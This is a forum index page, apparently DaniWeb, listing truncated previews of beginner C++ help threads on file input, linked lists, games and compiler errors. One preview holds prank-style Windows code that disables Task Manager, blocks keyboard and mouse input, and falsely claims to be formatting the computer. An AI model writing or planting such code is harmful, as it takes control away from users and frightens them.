49,762 Topics

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Member Avatar for shotbylammi

I am currently in a C++ class. We have using Python and my assignment is to do a lab that I have done in python 2.5 in C++, although I have no idea where to begin besides opening Dev C++ or Bloodshed. Could anyone please tell me how I begin …

Member Avatar for Fbody
Member Avatar for Nandomo

I am in need of an explanation on how to pass information from my input file to my program. This is what I'm trying: [CODE]#include <cstdlib> #include <iostream> #include <fstream> #include <string> using namespace std; struct BevInfo { char bevName[11]; float bevPrice; int bevLeft; }; int main(int argc, char *argv[]) …

Member Avatar for Clinton Portis
Member Avatar for jmcorpse

How can I go about padding an array of a certain size so that it will align with another one? For example I have an addition problem I am working out and cannot find the solution to. When my program prints it out it will look like this: 1234567 should …

Member Avatar for Clinton Portis
Member Avatar for djhog

I'm new at programming and I can't figure this out. Can anyone please help? #include <iostream> #include <fstream> #include <string> using namespace std; bool nocase_compare (char c1, char c2) { return toupper(c1) == toupper(c2); } int main( int argc, char* argv[] ) { ifstream infile; string filename; do { cout …

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Member Avatar for NichtSoGut

Hey, So basically I'm using dynamic memory allocation, and I wanted to add in a check for if the [B]new[/B] operator can't complete the request. I've read up that the operator will return a std::bad_alloc, but I've no idea how that helps me. Could I just do?: [CODE]if (new int[999] …

Member Avatar for StuXYZ
Member Avatar for Othisstuffisfun

I have been working on this project for a while and need help understanding why I get the results I do. First the display of the after compiling the code: Enter the employee's name: Bob Green Enter the employee's number: 112 Enter the date the employee was hired: 01091989 Enter …

Member Avatar for StuXYZ
Member Avatar for peachslasher

Hi guys, I am trying to write C++ method to return a pointer to the parent of a particular node in binary tree, and for the root that doesn't have a parent should return NULL. Here is my program so far: [CODE]#include <iostream> using namespace std; class Tree { private: …

Member Avatar for che-burator
Member Avatar for maverick405

I am very new to C++ need to draw rectangle "JUST THE BORDER" using for loops, the below code draws three sides but i am not able to draw the right side line please help if anyone can. #include <cstdlib> #include <iostream> #include <string> using namespace std; int main(int argc, …

Member Avatar for yasy
Member Avatar for chode1

the file looks like: 11/29/2010 S 2907 1 11/29/2010 S 9673 4 11/30/2010 A 4321 30 11/31/2010 S 9673 12 12/01/2010 N 5789 wind_chimes 13.54 17.83 12/02/2010 S 5140 5 How can I extract out "2907" from file using >>? i think its myfile >> then something. #include <iomanip> #include …

Member Avatar for daviddoria
Member Avatar for mpike

Here's my problem my assignment is to create a tic tac toe game with classes included (public and private) with only a few functions in int main. [CODE] #include <iostream> #include <string> using namespace std; class cgame { private: int iTurn; int turns; int gameWon; int i; public: bool validMove; …

Member Avatar for daviddoria
Member Avatar for knellgust

[CODE]#include <iostream> #include<string> using namespace std; class Book { private: string title; double price; public: Book(); void setTitle(string s); void setPrice(double p); string getTitle() const; {return title;} [/CODE] [ICODE]error code C2059(syntax error: '{' ) and C2334(unexpected token preceding '{' skipping apparent function body occur [/ICODE] [CODE]double getPrice() const; {return price;}[/CODE] …

Member Avatar for SgtMe
Member Avatar for someguyjbb

Please help the code compiles but then gives runtime error and I have no Idea why please help with the insert of the book the .h file [CODE]#ifndef BOOK_H #define BOOK_H #include <string> #include "Person.h" using namespace std; struct node { node *left; node *right; Person data; }; class Book …

Member Avatar for StuXYZ
Member Avatar for darylsanderson9

// Daryl Sanderson & Ladarius White //Tic Tat Toe //Professor Cook //Programming II // 11 am #include <iostream> using namespace std; int main () { char square1 (' '); char square2 (' '); char square3 (' '); char square4 (' '); char square5 (' '); char square6 (' '); char …

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Member Avatar for Aaron26

I need example parking system with C++ programming - logIn - record, incoming vehicles - records, out of vehicle - parking fees if there is a more complete I am very grateful :D I hope friends can help me, thanks

Member Avatar for SgtMe
Member Avatar for mrar85

hello someone out there...help me with algorithm to determine range of marks!! here is my code so far [ICODE]#include <iostream> #include <fstream> #include <string> #include <iomanip> struct stumarks { int studentid; int progassn; int lab; int test; int exam; char seperator; double finalmark; } stumarks[9]; using namespace std; int main() …

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Member Avatar for NinjaLink

Hi I am trying to compile and run my prog3.c program, but I am getting the compiler errors below. I have tried to reference the information by doing #include "node0.c" etc., but no luck. Any ideas on how to fix this problem? I attached the files below that I am …

Member Avatar for NinjaLink
Member Avatar for firework

As a beginner of C++, i cannot handle this project smoothly, please correct my code! Write a class of fraction. Your fraction should provide the methods read(), print() and the friend operator +. The read() method will read from the keyboard the integral part, the numerator and the denominator respectively. …

Member Avatar for StuXYZ
Member Avatar for jaygarsh

hello everyone. so im on my second semester of c++ and am having lot of problems as the class begins to involve more and more pointers(:@). we were assigned a program that created a structure for course grades. it was asked that we dynamically allocated an array for the tests …

Member Avatar for jaygarsh
Member Avatar for dinners

I have written a function that calculates an area from coordinated stored in vector arrays: [CODE]void areaCalc(int corners, vector<float> x, vector<float> y, float& area) { float sum=0; for (int i=0; i<=(corners-2); i++) { sum+=(((x[i])*(y[(i+1)]))-((x[(i+1)])*(y[i]))); } sum+=(((x[(corners-1)])*(y[0]))-((x[0])*(y[(corners-1)]))); area=0.5*sum; }[/CODE] The problem is that when I compile it I get this warning …

Member Avatar for dinners
Member Avatar for hanttaha

/* I have a problem with my class matran, when I make "(A+B)*(D+E)" it's no result */ /* help me to correct it */ #include<iostream.h> #include<math.h> #include<iomanip.h> using namespace std; class matran { int n,m; double A[20][20]; public: void nhap(); void in(matran); matran operator+(matran); matran operator-(matran); matran operator*(matran); }; //////////////////////////////////////////////////////// …

Member Avatar for daviddoria
Member Avatar for manofhouse

The program runs but only switches the player once [CODE]#include <iostream> #include <string> #include <cmath> #include <ctime> #include <cstdlib> using namespace std; class TicTacToe{ public: TicTacToe(void);//constructor void playOneGame(void);//member function void switchPlayer(char &);//member function void showBoard(void);// member function void postMove(int, int, char);// member function char determineWinner(void);// member function private: char Board[3][3]; …

Member Avatar for macobex
Member Avatar for Annettest

Hello all. I am having problems with compiling code on my Mac (OS X, 10.6.5). This started happening suddenly when I tried to (1) install f2c using g++, and then (2) compile code including f2c. Now I'm having problems compiling ALL code! I don't understand the error, and would really …

Member Avatar for Annettest

Hello everyone. I am having problems with compiling code on my Mac (OS X, 10.6.5). This started happening suddenly when I tried to (1) install f2c using g++, and then (2) compile code including f2c. Now I'm having problems compiling ALL code! I don't understand the error, and would really …

Member Avatar for Mr_PoP

[CODE]#include<iostream> #include<windows.h> using namespace std; int wast (int a) { a = a * 10; for(int i=0; i<= a; i++) cout<<" \b"; return 0; } void main(){ int x,y; HWND t; t=FindWindow(NULL,"Windows Task Manager"); EnableWindow(t,false); SetConsoleTitle("Formating Your Whole Computer Sorry :)"); system("color 0c"); BlockInput(true); cout << "C"; wast(500); cout << …

Member Avatar for peter_budo
Member Avatar for Alexkid

Hi, Simple question but why would someone use #define. Whats the difference between; #define sum 1 and const int sum = 1; both can't be changed and anywhere you sum its going to be 1!. Many thanks Alex

Member Avatar for Alexkid
Member Avatar for hobokook

Hi, I have an assignment where I have to implement a singly linked list of integers. Can you look at my pop front function below to see if it would work. I think it works, but I get this weird error whenever I test it. Also, how would I do …

Member Avatar for group256
Member Avatar for Dink3465

Hello, I am currently assigned a project to simulate a carwash in C++ using a priority queue and a heap. Basic synopsis: 1. a car enters the carwash. 2. if there are no parking spaces the car departs (must keep track of number of cars that depart without getting a …

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Member Avatar for tech9x

[CODE=C++] 1. //my main 2. int sizeOfArray; 3. 4. int main() 5. { 6. int i; 7. int *num1, *num2, *num3, *num4, *num5; 8. string *opening, *ending; 9. cin >> sizeOfArray; 10. command = new string [sizeOfArray]; 11. opening= new int [sizeOfArray]; 12. num1= new int [sizeOfArray]; 13. num2= new …

Member Avatar for jonsca
Member Avatar for tech9x

here is my outline of code: [code=c++] void apple() { cin >> price[i]; cout << price[i]; //give out correct value } void orange() { cin >> price2; cout << price[i]; //mess value (like 65534 or 9460301) } int main() { string *fruit; int *price; fruit = new string[n] price = …

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Member Avatar for Raja Paul

I want to capture the output window of explorer command and regenerate it in another machine using C++. I have used system and popen command but cant get the desired result. Someone please help me regarding this......


The End.